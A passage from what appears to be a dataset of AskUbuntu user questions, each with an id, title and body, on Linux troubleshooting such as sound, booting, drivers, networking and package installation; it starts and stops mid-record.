stumm : no lautstärke : 0 : 100 % 1 : 100 % 0 : 0,00 db 1 : 0,00 db verteilung 0,00 basis-lautstärke : 100 % 0,00 db sink-monitor : alsa_output.pci-0000_00_1b.0.analog-stereo latenz : 0 usec , eingestellt 0 usec flags : decibel_volume latency eigenschaften : device.description = `` monitor of internes audio analog stereo '' device.class = `` monitor '' alsa.card = `` 0 '' alsa.card_name = `` hda intel '' alsa.long_card_name = `` hda intel at 0xf9ff8000 irq 45 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 3a3e '' device.product.name = `` 82801ji ( ich10 family ) hd audio controller '' device.form_factor = `` internal '' device.string = `` 0 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' formate : pcm quelle # 2 status : suspended name : alsa_input.pci-0000_00_1b.0.analog-stereo beschreibung : internes audio analog stereo treiber : module-alsa-card.c sample-angabe : s16le 2ch 44100hz kanalzuordnung : front-left , front-right besitzer-modul : 6 stumm : yes lautstärke : 0 : 100 % 1 : 100 % 0 : 0,00 db 1 : 0,00 db verteilung 0,00 basis-lautstärke : 10 % -60,75 db sink-monitor : k. a. latenz : 0 usec , eingestellt 0 usec flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency eigenschaften : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` vt1708s analog '' alsa.id = `` vt1708s analog '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 0 '' alsa.card_name = `` hda intel '' alsa.long_card_name = `` hda intel at 0xf9ff8000 irq 45 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 3a3e '' device.product.name = `` 82801ji ( ich10 family ) hd audio controller '' device.form_factor = `` internal '' device.string = `` front:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` analog stereo '' device.description = `` internes audio analog stereo '' alsa.mixer_name = `` via vt1708s '' alsa.components = `` hda:11060397,10438346,00100000 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' profile : analog-input-microphone-front : mikrofon vorne ( priority : 8500 , not available ) analog-input-microphone-rear : mikrofon hinten ( priority : 8200 , available ) analog-input-linein : line in ( priority : 8100 , not available ) aktive profile : analog-input-microphone-rear formate : pcm quelle # 3 status : suspended name : alsa_output.pci-0000_00_1b.0.analog-stereo.equalizer.monitor beschreibung : monitor of fft based equalizer on internes audio analog stereo treiber : module-equalizer-sink.c sample-angabe : float32le 2ch 44100hz kanalzuordnung : front-left , front-right besitzer-modul : 22 stumm : no lautstärke : 0 : 100 % 1 : 100 % 0 : 0,00 db 1 : 0,00 db verteilung 0,00 basis-lautstärke : 100 % 0,00 db sink-monitor : alsa_output.pci-0000_00_1b.0.analog-stereo.equalizer latenz : 0 usec , eingestellt 0 usec flags : decibel_volume latency eigenschaften : device.description = `` monitor of fft based equalizer on internes audio analog stereo '' device.class = `` monitor '' device.icon_name = `` audio-input-microphone '' formate : pcm speaker-test -t wav -c2 works allright . there is one information , though , which i wonder whether or not it has any relevance , namely for the source # 0 alsa_input.usb-0ccd_grabster_av_350-01-g350.analog-stereo there is no sink-monitor listed ! ? i do n't know anymore which screw to turn . i do hope someone in the forum has some systematic advise for me .
434296	what do compiz short-cuts < shift > prior and < shift > next mean ?	i 'm trying to use the negative plug-in but it does not work . first , i do n't know what prior and next are . next , if i change the short-cuts they just revert back after i re-open the setting manager .
434300	resizing xubuntu patrition	ok , here is the problem . i have a xubuntu in virtual box . i have resized the machine hd and added the missing space using gparted to the patrition as seen in this picture : after resize the new size should be 25 gb . however when running console i only get : $ df -h filesystem size used avail use % mounted on /dev/mapper/xubuntu -- vg-root 18g 14g 2,5g 85 % / ^ -- - size is n't increased to ~25gb -- none 4,0k 0 4,0k 0 % /sys/fs/cgroup udev 1,5g 4,0k 1,5g 1 % /dev tmpfs 302m 860k 301m 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 1,5g 80k 1,5g 1 % /run/shm none 100m 20k 100m 1 % /run/user /dev/sda1 236m 90m 134m 41 % /boot so the question is - how do i safely expand my current fs to full size ? i need to add those missing 6gb to my primary patrition .
434304	how to fix “the system is running in low-graphics mode” error ? cntd	so i was having the “the system is running in low-graphics mode” problem which is decribed in this question . in order to solve it i proceeded as in the answers there . i first tried : sudo apt-get install -- reinstall ubuntu-desktop sudo reboot which did n't work . after i went to the accepted answer which says to do : sudo apt-get install fglrx for the user with an amd graphic card ( my case ) . in order to check it , i rebooted the system . now whenever i start linux either normally or recovery mode - > failsafex i do n't get anymore the above mentioned error . it tries to load ubuntu ( the screen get 's purpleish ) and before the screen with `` ubuntu '' in the middle appears it goes black and freezes with an underscore in the upper left corner of the screen . the effect is very similar to what i used to get before , when i had the error and i used to proceed with the steps ubuntu offered me , picking `` run with low-graphics mode for just one session '' on this menu : how can i fix the issue i am having ?
434305	get information about my psu	i want to know what kind of power supply i have and what wattage it has . i tried : sudo dmidecode -t 39 but that did n't show any specs . what do i need to do ? i am on ubuntu 13.10
434306	installing ubuntu on a windows 7 laptop without internet access	i m trying to install ubuntu 12.0.4.4 on a win 7 laptop without internet access , the wubi.exe and the iso files are in the same folder but wubi fails again and again with a message that it is not able to find the required disk imnage files ... what to do..please hel
434308	use `` cobalt '' gedit theme on kate	where could i find the cobalt theme for kate ? or , if there is n't , where can i obtain gedit 's colors so that i can manually put them on kate creating a custom theme ?
434310	is there an unofficial box.com client for linux ?	i know box.com does not have a non-server client for linux . is there , then , a way to download my files to my pc using an unofficial client ?
434311	how can i activate a custom keyboard layout	i have defined a custom keyboard layout following this description : custom keyboard layout definitions the layout definition is added to this file : /usr/share/x11/xkb/symbols/us and it starts like this : partial alphanumeric_keys modifier_keys xkb_symbols `` usintde '' { name [ group1 ] = `` english ( us , alternative international and german ) '' ; include `` us '' i can use it on the command line using setxkbmap 'us ( usintde ) ' . however , in ubuntu 13.10 , i can not choose it from the unity settings menus . i tried settings > text input and then clicked on the + sign , but none of the layouts is named like mine ( also after new login and restart ) . how can i activate this customly defined layout ( and then use it in the layout switcher ) ?
434314	cant access partitions	i have just replaced ubuntu 13.10 with windows . i have created some partitions in windows . now after installing ubuntu i cant see that partitions ... how can i access it .
434322	having trouble permanently setting gateway	i am on a ubuntu 12.04 vm i read https : //help.ubuntu.com/12.04/serverguide/network-configuration.html which says i can set the gateway with a command like : sudo route add default gw 10.0.2.211 eth0 which works , but clears after a reboot . i also tried to set the gateway by editing my /etc/network/interface file : auto eth0 iface eth0 inet dhcp gateway 10.0.2.211 pre-up sleep 2 i just added the gateway line . that does n't seem to work at all though . i tried rebooting and running : sudo /etc/init.d/networking restart
434324	permissions issue with netatalk	i set up an ubuntu 12.04 server recently for my business , and we installed netatalk so we could share company files to our mac computers . here is the line we used in our applevolumes.default file : /media/files/business `` business '' allow : @ business perm:0770 umask:0007 also , our primary group for all users is `` business '' . so here 's the issue . when we move a bunch of files and folders over , the correct permissions are set ( 770 ) , but for some reason , for certain filetypes , the will only open for the owner . a text document will work for anyone , where as an .mp4 file only works for it 's owner , even though their permissions are identical : -rwxrwx -- - 1 user1 business 205328400 jan 6 15:00 video.mp4 -rwxrwx -- - 1 user1 business 665 feb 21 09:14 business.rtf notes : server is ubuntu 12.04 . everything is up to date . we are exclusively mac . all of our macs run os x mavericks . we have a drobo that hosts our files currently ( also using afp ) , and it works fine when we use it . so we know it 's not our computers . the afp shares are on the ubuntu server all being shared from a local partition being mounted by fstab on boot . update ( 3/14/14 ) : i got some help from sarnold on the # ubuntu-server channel , we tried removing extended attributes from all these files by mounting the partition without the extended attributes . after testing , it did n't help any . update ( 3/17/14 ) : i tested if maybe it was a file size issue , but big text files over 200mb were fine , and really small .zip files under 1mb did n't work for non-owners . i also gave full permissions ( 777 ) to a zip file , and that did n't seem to make a difference .
434325	boot failure deleted ubuntu partition ; getting grub rescue command	i accidentally deleted the partition containing ubuntu while in win-7 . unknowingly i hibernated my system . when i started my system i found the grub rescue command . i tried to restart but ca n't get the interface for choosing reboot options . please help me .
434326	help with iptables to redirect all traffic to local proxy server and output it	first i could say i am not so good at internet management and all this stuff is very confusing me ... to my laptop , internet comes from wlan2 interface . it is being shared through interface eth0 . what command/commands should i use for iptables if i want to redirect all traffic coming from wlan2 through local proxy server 127.0.0.1:3310 so traffic which goes out through eth0 is being proxified . p.s . 127.0.0.1:3310 is cntlm , because for an example if my proxy server is 172.16.1.100:8080 with authentication , i set it up and i can use 127.0.0.1:3310 as the same proxy without authentication . so , any suggestions ?
434331	problem to install libreoffice	when i install libreoffice appear vitor @ vitor : ~/downloads $ sudo dpkg -i libreoffice_4.2.2.1_linux_x86_deb dpkg-split : erro : erro lendo libreoffice_4.2.2.1_linux_x86_deb : é um diretório dpkg : erro ao processar libreoffice_4.2.2.1_linux_x86_deb ( -- install ) : sub-processo dpkg-split retornou estado de saída de erro 2 erros foram encontrados durante o processamento de : libreoffice_4.2.2.1_linux_x86_deb vitor @ vitor : ~/downloads $ why i ca n't install libreoffice using dpkg ?
434336	a lot of system settings are missing after installing pantheon	i installed pantheon on ubuntu 13.10 and a ton of settings are missing . i only have these settings : defaults , desktop , tweaks ( i installed tweaks ) , keyboard , power , and about . what do i do ?
434339	service notifications in ubuntu phone ?	i 'm thinking to create a messaging app for ubuntu touch . android apps are n't using 3g every time because it 'll drain the battery ( are they push notifications ? ) . has ubuntu phone something like that ? can an app for ubuntu phone use that push notifications from the javascript ? thanks in advance !
434340	i did instaled ubuntu on inspiron b120 but can not connect to internet	i try to connect tru wi-fi and also tru dsl cable , but i have not been able to connect yet . it waas connecting just fine when running on windows , i am really new to ubuntu so any advise i can get will be apreciated . i installed : ubuntu 12.04 lts laptop has : 2 gb ram and intel celeron m procesor 1.40ghz
434343	where to get the latest gcc ( gnu c compiler )	currently my version is 4.8.4 but ive found that some sites offer a 4.9 version . like this http : //gcc.igor.onlinedirect.bg/snapshots but where do they get the source from ? i want to know so i can be sure i really have the latest version because of rep limits i cant answer my question here so i edited my question : i finally found it ! : d ftp : //gcc.gnu.org/pub/gcc/snapshots
434345	acer r7 - keyboard features in ubuntu	i 'm considering to buy an acer r7 572- i guess with an i7 . so from previous hw-experiences i know , that `` runs on ubuntu '' usually means , that most basics are fulfilled . but with such a decent device ( assumed that there is a working wifi driver out there ) , i would like to know , which special keys of the keyboard actually work ? as being a keyboard baby , i 'd like to see , that the most important things work - if not i will help the developers to work on it - if they like . my question : from existing postings i can see , that there are some people out there having ubuntu running on an r7 . could you please be so kind , to describe here , which special keys on the keyboard actually work and which not ? for me and i guess for others as well there are some vital things : - keyboard light on and off - display brightness ? - sound buttons ( on/off/volume up and down ) - wifi on and off = > if the r7 does n't have some of the above buttons : sorry , i only put my hands on the keyboard light button , as i was too overwhelmed by the r7 in general . i hope this does n't cause too much efforts to you - it would be nice ! thanks in advance !
434347	extra noise in speakers when all media applications are closed	i use ubuntu 12.04 system on my laptop and have the following problem . i plugged sound speaker and now i have some extra noise ... the most wondering thing is that this extra noise appear only if i do n't launch any application . for instance if i run amarok , vlc or what ever to play music or movie i have high quality clear sound . but when i close that application in a few seconds i get extra noise again . i did n't have this problem before . can somebody help me what is going wrong ?
434349	why wo n't ubuntu recognize my login and password ?	i ca n't do anything because ubuntu always asks for a login and password . i have auto-login selected and it still asks for a password .
434350	how to change avatar in skype ?	i 've installed skype on my ubuntu by doing this : sudo add-apt-repository `` deb http : //archive.canonical.com/ $ ( lsb_release -sc ) partner '' sudo apt-get update sudo apt-get install skype i 've registered my account . and i want to change my avatar . but i do n't know how : (
434351	emacs hangs when run through sshing to my ubuntu box ( 13.10 ) ,	running ubuntu 13.10 , i can not run emacs when sshing to my box ssh -l username someipaddress when i run emacs , it simply hangs . i have also have recently installed dbus-x11 . before installing dbus-x11 , i would get a crash when trying to run emacs . ( emacs:3306 ) : gconf-warning ** : client failed to connect to the d-bus daemon : //bin/dbus-launch terminated abnormally without any error message ( emacs:3306 ) : gconf-warning ** : client failed to connect to the d-bus daemon : //bin/dbus-launch terminated abnormally without any error message ( emacs:3306 ) : gconf-warning ** : client failed to connect to the d-bus daemon : //bin/dbus-launch terminated abnormally without any error message ( emacs:3306 ) : gconf-warning ** : client failed to connect to the d-bus daemon : //bin/dbus-launch terminated abnormally without any error message ( emacs:3306 ) : gconf-warning ** : client failed to connect to the d-bus daemon : //bin/dbus-launch terminated abnormally without any error message ( emacs:3306 ) : gconf-warning ** : client failed to connect to the d-bus daemon : //bin/dbus-launch terminated abnormally without any error message i have another ubuntu box ( 12.10 ) ( vm though ) running from a different provider . however i have no issues running emacs . in both cases i used apt-get to install emacs .
434358	how do i access windows shares from bash ?	probably total noob question . i installed ubuntu in a vmware player . works fine . i usually work in terminal and did n't realise until today that i could use the files icon to connect to my windows host machine ( and indeed my office network . ) fabulous ! but ... then ... how do i access these new shares from inside bash ? from my default prompt , should n't i see some \my-windows-share or do i need to mount these drives somehow 'manually ' inside terminal ? if so , how ? i see a number of answers regarding virtualbox . do n't know if that applies to me . i guess i assumed that once i was connected via files i would automatically be connected with terminal .
434359	remove the html5 draggable icon	i 'm on ubuntu 13.10 with openbox as a wm . i need to remove the icon that shows up whenever i drag on a draggable element ( i.e . one with the html5 draggable= '' true '' attribute ) inside chrome ( or firefox if that matters ) . it 's a little document with a blue picture inside it . where can i find that icon or is there a way to stop it from showing up ? ( to trigger this behavior , visit http : //stereobit.github.io/dragend/ and drag horizontally )
434360	how to return to command line in 12.04 server	how do i return to the command line in ubuntu 12.04 server when all there is , is a line with nothing but a flashing underscore on it . i typed a command wrong and it is stuck like this .
434361	how to install 64-bit catalyst drivers ? ubuntu 13.10	i have a hd6870 so it is a fairly new card . i want to know the right way to install the drivers . i am a linux noob . got tired of microsoft 's crap . can someone help so i can actually use linux ?
434362	brightness function keys problem	i have an hp 650 notebook , and i just finished installing ubuntu 13.10 . the problem is that brightness function keys do n't work ( f2 and f3 ) . i tried changing grub_cmdline_linux_default and updating grub but it does n't work . directory /sys/class/backlight is empty . and `` lspci | grep -i vga '' command outputs the following : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) any help , please ?
434363	operating system loader	i installed ubuntu 12.04 with the option to keep windows 7 . the installer indicated i could choose the os to load on startup . however , only windows 7 loads when the computer is restarted , with no option for ubuntu . what can i do to fix ?
434365	ubuntu as tv mediacenter	okey.. iam a new ubuntu user and have just installed it on my old laptop ( still good in specs ) . iam currently running it from a 16gb usb flashdrive . so my question is . i want to make a full medie center in my house . from ipad to mobile phone and be able to play music on my ubuntu pc witch is connected to stereo . currently iam looking at using plex . but if anyone have a briliant idea on how to get this done . shout out ! ican use money on disc space . even on a little server . i want a home project in other words but need some help getting started . if this is the wrong place to ask ? scream out ! thanks . brage
434366	trying to install ubuntu 12.04 on acer aspire v3-772g	i just bought a new laptop . since win8 is crap , i want to dualboot win7 and ubuntu , like i do on my desktop . i managed to get win7 installed ( had to change boot from uefi to legacy and convert the gpt partitioning to mbr ) , but when i try to boot into my ubuntu live usb stick , it hangs as soon as i press any keyboard button . i previously installed ubuntu on my desktop using that exact stick , the boot image was downloaded directly from ubuntu and i created the stick using unetbootin . my machine boots into the selection screen , where i can choose to install ubuntu , try it without installing , etc , but when i press any button , the timer at the bottom freezes . when i let the timer count to 0 , a flashing underscore appears below , but nothing else happens . i have to shutdown the computer manually in both cases . has anyone an idea what the problem might be or successfully installed ubuntu on this machine ?
434369	ruby - no such file to load [ gems ]	this is error : [ error ] no such file to load -- readline [ tip ] try to run 'gem install readline ' or 'gem install -- user-install readline ' . if you still get an error , please see readme file or https : //github.com/wpscanteam/wpscan then i run those command but again i got error : error : could not find a valid gem 'readline ' ( > = 0 ) in any repository those errors i got when i use `` ruby wpscan.rb '' help me please .
434370	ca n't get any sound from ubuntu	i ca n't get any kind of sound from my pc . i installed ubuntu 12.04 on my somewhat old desktop as the soundcard was n't recognised by my ( unlicensed ) windows 7 . ubuntu seems to have detected my card , as it shows up in the sound settings menu , and also in alsamixer ( which is n't muted ) . i 've tried all of the outputs on back and front of the machine , to no avail . could one of you kind people tell me what the next step is ? thanks a lot !
434373	g600 logitech software wine usb integration	i am trying to integrate a usb patch for wine so that i may use the logitech g series software because the program loads the software but then doesnât sense the usb plug-in can anyone help me please ?
434376	ath9k driver suddenly does n't see channel 13 anymore	suddenly , after upgrade to linux kernel 3.11.0-19 , my wireless card with the ath9k driver is no longer seeing the 13th channel , even though it worked fine for the last year and half . it also still works fine on another ubuntu laptop and an android phone . how can i re-enable the 13th channel ? it is very necessary as most of the channels are taken here .
434377	application do not work under wine	can anyone help me to use an application that originally works only on windows ? the application name is embroidery reader and is necessary to view .pes file for a smart sawing machine . i use ubuntu 13.10
434378	system bios does n't show ubuntu as boot option after installation ?	after trying and failing many times to create a bootable usb , i finally managed to create one using universal usb installer from pendrivelinux.com . i created a bootable usb with ubuntu 13.10 64-bit flavour and managed to successfully boot to the usb after disabling secure boot , enabling uefi & legacy boot and manually selecting my usb drive . after successfully installing ubuntu on a new partition on my ssd , i removed my usb stick , restarted my computer and spammed the enter key in order to get into my bios . i went to manually select where to boot from , but there was no new option for ubuntu . because i 'm a computer science student , i think of myself as being fairly clever and so i simply selected my ssd , but it ran through a different boot sequence ( neither what my computer used to boot through nor my new shiny ubuntu os ) . what i think is happening is that my computer normally quick boots windows 8.1 through my 16gb msata , but it booted windows 8.1 through my ssd when i selected it , rather than ubuntu . so what i 'm asking is , how do i get it to boot ubuntu rather than windows 8.1 from my ssd when both are located on the ssd and there is no option for anything else ? is there a way to modify the bios so that it gives me the option to boot from one partition on my ssd rather than another ? i have as of yet been unable to boot into ubuntu , i 've only managed to boot to windows 8.1 two different ways . i 've included tech specs below , but if you need any more information i 'll make sure to follow up . machine : thinkpad s1 yoga tech specs : intel core i7-4500u processor ( 4mb cache , up to 3.00ghz ) windows 8.1 64 8gb pc3-12800 ddr3l on mb intel hd graphics 4400 256gb solid state drive sata 6g 16gb msata
434380	trying to install ubuntu on lenovo t61 laptop	i downloaded the ubuntu file ( latest stable release ) to a blank cd-r but got the error message that there was not enough room on the cd . one file got on the cd i think but more was supposed to be on it . so how big are the files going onto the cd from ubuntu ? i tried downloading to dvd-r but that did n't work at all : it appears that the sonic program i used was not capable of burning dvds . why does the ubuntu help topic on downloading sometimes say use a cd and other times a dvd ? the program i was using is the default on my laptop , sonic . should i use another program ? is n't there a default windows program for burning cds and dvds ? how do i change the default program for the optical d : drive ? i used the universal usb installer for linux to make a cd but that did not work . see comments below for details . windows xp sp3 . firefox .
434381	how do i creaet simple ip failover for 2 nics using heartbeat ?	i was successful in configuring a simple heartbeat setup on ubuntu 12.04 , which will fail-over two vips to a second server when both ethernet links fail . what i ca n't figure out is how to simultaneously fail-over two vips when either of the two nics looses a link connection . heatbeat will detect the link is down , but until both go down , resources will not fail-over . i am not using any cluster management like pacemaker . i would appreciate a point in the right direction . thanks .
434384	problems moving a web link on the desktop	i am having this annoying problem that my web links that i have dragged from firefox can not be moved afterwards . when i try , i just get a copy of the link as a file . i do n't know if the problem is caused by bad settings on firefox or on ubuntu . but what i see is that the property of the web file states : filesize , access or modification is unknown . the permission could not be determined . i have ubuntu version 14 , but 13 had the same problem . the `` desktop '' dir has all the read/write rights set and the web link has the same ! chmod 777 on the web link did not do anything good . i hope you can help me with some of you magic . thanks . henrik .
434386	kate does not see lilypond editing mode	i am trying to edit a lilypond file , but when i open the file it is shown in normal mode . it used to be that there were highlighting and view settings that would be associated with a lilypond file . for example , curly brackets would be treated a certain way , and accents like \staccattissimo and \marcato would be in bold orange . lilypond is installed , and no lilypond mode is shown in tools > mode . in dolphin , the normal lilypond music sheet filetype is attributed to the file . what is the correct way to get kate to use the lilypond editing mode ?
434387	software to index and document large-number of pdf documents based on certain criteria	i am not tech savvy at all ... .at our law firm we have literally tens of thousands of pdf documents that the attorney wants indexed . when i say indexed , i mean she wants to make a chart and input the bates numbering , the title of the document , and the date of the document . is there any such software anywhere that will help with this ? this literally takes us weeks to complete , and so i am searching for someone or something that would help out so we can get more accomplished .
434393	installing ubuntu on android netbooks	i 'm thinking to buy one of these cheap chinese netbooks , they run android , ideal for university , so i wo n't have to carry my laptop . i want to remove android , and install ubuntu derivatives , xubuntu , lubuntu , but most probably xubuntu , lubuntu is n't much lighter as far as i know . will the arm version work ? or linux ca n't be installed on such devices ? what i 'm looking at is more of a mobile tablet than a laptop . knowing that linux ca n't be installed on mobiles got me thinking about the possible issue . if the problem was about the requirements , i 'd install debian or build gentoo and make the lightest weight distro ever , but i think it 's not about how heavy the distro is , it 's about whether linux runs on mobile like laptops or not , besides xubuntu is pretty much as lightweight as it gets especially when using the mini cd
434396	double boot : why can i not start ubuntu ?	i just installed ubuntu 12.04 . i have windows xp sp3 , 2 gb ram , 1 tb hdd . i did everything that says that i should . i made swap partition and everything . though , it did n't ask me if i want to import data from xp to ubuntu while it was installing . in the end , it said that everything installed successfully . then it rebooted it itself , it said in tutorial that if windows start first , it is not big of a deal . i rebooted it again and againg windows started . i read somewhere that i should hold shift while booting so that grub menu start , but it did n't . i also went to bios and made a first boot device a hd that ubuntu is on . nothing !
434397	grub > prompt when installing via usb	i 'm trying to install ubuntu 13.10 on a lenovo thinkpad s540 . i installed an iso on a 2gb usb stick as per instructions here : http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows . when i booted from the usb , it goes straight away to a grub > prompt , with no indication of any error . i disabled secure boot and quick boot in the bios , but the same thing occurs . any ideas on how i can proceed ? i repeated the procedure on a different usb stick , and was able to get further .
434402	get the latest lubuntu-desktop in ubuntu 12.04	i need to stay with ubuntu 12.04 but i would like to use the lubuntu desktop without its apps so the package i need is lubuntu-core . now the package from the 12.04 repos is very old . which repo do i need to add in order to get the newest version of lubuntu-core available ( the one that comes with lubuntu 13.10 i guess ) ?
434403	media buttons type a zero character	after updating to 13.10 , pressing a multimedia button ( volume , media playback , and wifi controls ) types a zero character '0 ' , as well as performing its desired function . i 'm using an hp dv7 laptop . how can i stop this ?
434404	apt-get 'held broken packages ' attempting to install kubuntu-desktop	$ sudo apt-get install kubuntu-desktop reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : kubuntu-desktop : depends : kde-workspace-bin but it is not going to be installed depends : language-selector-kde but it is not going to be installed depends : plasma-desktop but it is not going to be installed depends : plasma-netbook but it is not going to be installed depends : software-properties-kde but it is not going to be installed recommends : akregator but it is not going to be installed recommends : apport-kde but it is not going to be installed recommends : apturl-kde but it is not going to be installed recommends : jockey-kde but it is not going to be installed recommends : kaddressbook but it is not going to be installed recommends : kde-config-touchpad but it is not going to be installed recommends : kdepim-kresources but it is not going to be installed recommends : kdepim-runtime but it is not going to be installed recommends : kdepim-strigi-plugins but it is not going to be installed recommends : kmail but it is not going to be installed recommends : knotes but it is not going to be installed recommends : kontact but it is not going to be installed recommends : kopete but it is not going to be installed recommends : korganizer but it is not going to be installed recommends : muon but it is not going to be installed recommends : muon-installer but it is not going to be installed recommends : muon-notifier but it is not going to be installed recommends : plasma-widget-facebook but it is not going to be installed recommends : plasma-widgets-addons but it is not going to be installed recommends : printer-applet but it is not going to be installed recommends : system-config-printer-kde but it is not going to be installed recommends : usb-creator-kde but it is not going to be installed recommends : userconfig but it is not going to be installed e : unable to correct problems , you have held broken packages . $ cat /etc/apt/sources.list # deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //us.archive.ubuntu.com/ubuntu/ precise main restricted universe deb-src http : //us.archive.ubuntu.com/ubuntu/ precise main restricted universe # # major bug fix updates produced after the final release of the # # distribution . deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted universe deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //us.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ precise-backports main restricted multiverse universe deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-backports main restricted multiverse universe deb http : //security.ubuntu.com/ubuntu precise-security main restricted universe deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu precise partner deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main deb http : //archive.canonical.com/ precise partner deb-src http : //archive.canonical.com/ precise partner $ cat /etc/apt/sources.list.d/* deb http : //ppa.launchpad.net/bitcoin/bitcoin/ubuntu precise main deb-src http : //ppa.launchpad.net/bitcoin/bitcoin/ubuntu precise main deb http : //ppa.launchpad.net/bitcoin/bitcoin/ubuntu precise main deb-src http : //ppa.launchpad.net/bitcoin/bitcoin/ubuntu precise main deb http : //ppa.launchpad.net/danielrichter2007/grub-customizer/ubuntu precise main deb-src http : //ppa.launchpad.net/danielrichter2007/grub-customizer/ubuntu precise main deb http : //ppa.launchpad.net/danielrichter2007/grub-customizer/ubuntu precise main deb-src http : //ppa.launchpad.net/danielrichter2007/grub-customizer/ubuntu precise main deb http : //ppa.launchpad.net/ehoover/compholio/ubuntu precise main deb-src http : //ppa.launchpad.net/ehoover/compholio/ubuntu precise main deb http : //ppa.launchpad.net/ehoover/compholio/ubuntu precise main deb-src http : //ppa.launchpad.net/ehoover/compholio/ubuntu precise main deb http : //ppa.launchpad.net/fossfreedom/rhythmbox-plugins/ubuntu precise main deb-src http : //ppa.launchpad.net/fossfreedom/rhythmbox-plugins/ubuntu precise main deb http : //ppa.launchpad.net/fossfreedom/rhythmbox-plugins/ubuntu precise main deb-src http : //ppa.launchpad.net/fossfreedom/rhythmbox-plugins/ubuntu precise main # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/musicmanager/deb/ stable main # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/musicmanager/deb/ stable main deb-src http : //ppa.launchpad.net/mefrio-g/plymouthmanager/ubuntu precise main deb http : //ppa.launchpad.net/mqchael/pipelight/ubuntu precise main deb-src http : //ppa.launchpad.net/mqchael/pipelight/ubuntu precise main deb http : //ppa.launchpad.net/mqchael/pipelight/ubuntu precise main deb-src http : //ppa.launchpad.net/mqchael/pipelight/ubuntu precise main deb http : //ppa.launchpad.net/phablet-team/tools/ubuntu precise main deb-src http : //ppa.launchpad.net/phablet-team/tools/ubuntu precise main deb http : //ppa.launchpad.net/phablet-team/tools/ubuntu precise main deb-src http : //ppa.launchpad.net/phablet-team/tools/ubuntu precise main deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/steam/ubuntu precise main # added by software-center ; credentials stored in /etc/apt/auth.conf deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/steam/ubuntu precise main # added by software-center ; credentials stored in /etc/apt/auth.conf deb http : //apt.spideroak.com/ubuntu-spideroak-hardy/ release restricted deb http : //apt.spideroak.com/ubuntu-spideroak-hardy/ release restricted deb http : //repo.steampowered.com/steam/ precise steam deb-src http : //repo.steampowered.com/steam/ precise steam deb http : //repo.steampowered.com/steam/ precise steam deb-src http : //repo.steampowered.com/steam/ precise steam deb-src http : //ppa.launchpad.net/ubuntu-sdk-team/ppa/ubuntu precise main deb http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu precise main deb-src http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu precise main deb http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu precise main deb-src http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu precise main deb-src http : //ppa.launchpad.net/webupd8team/gvfs-libmtp/ubuntu precise main deb-src http : 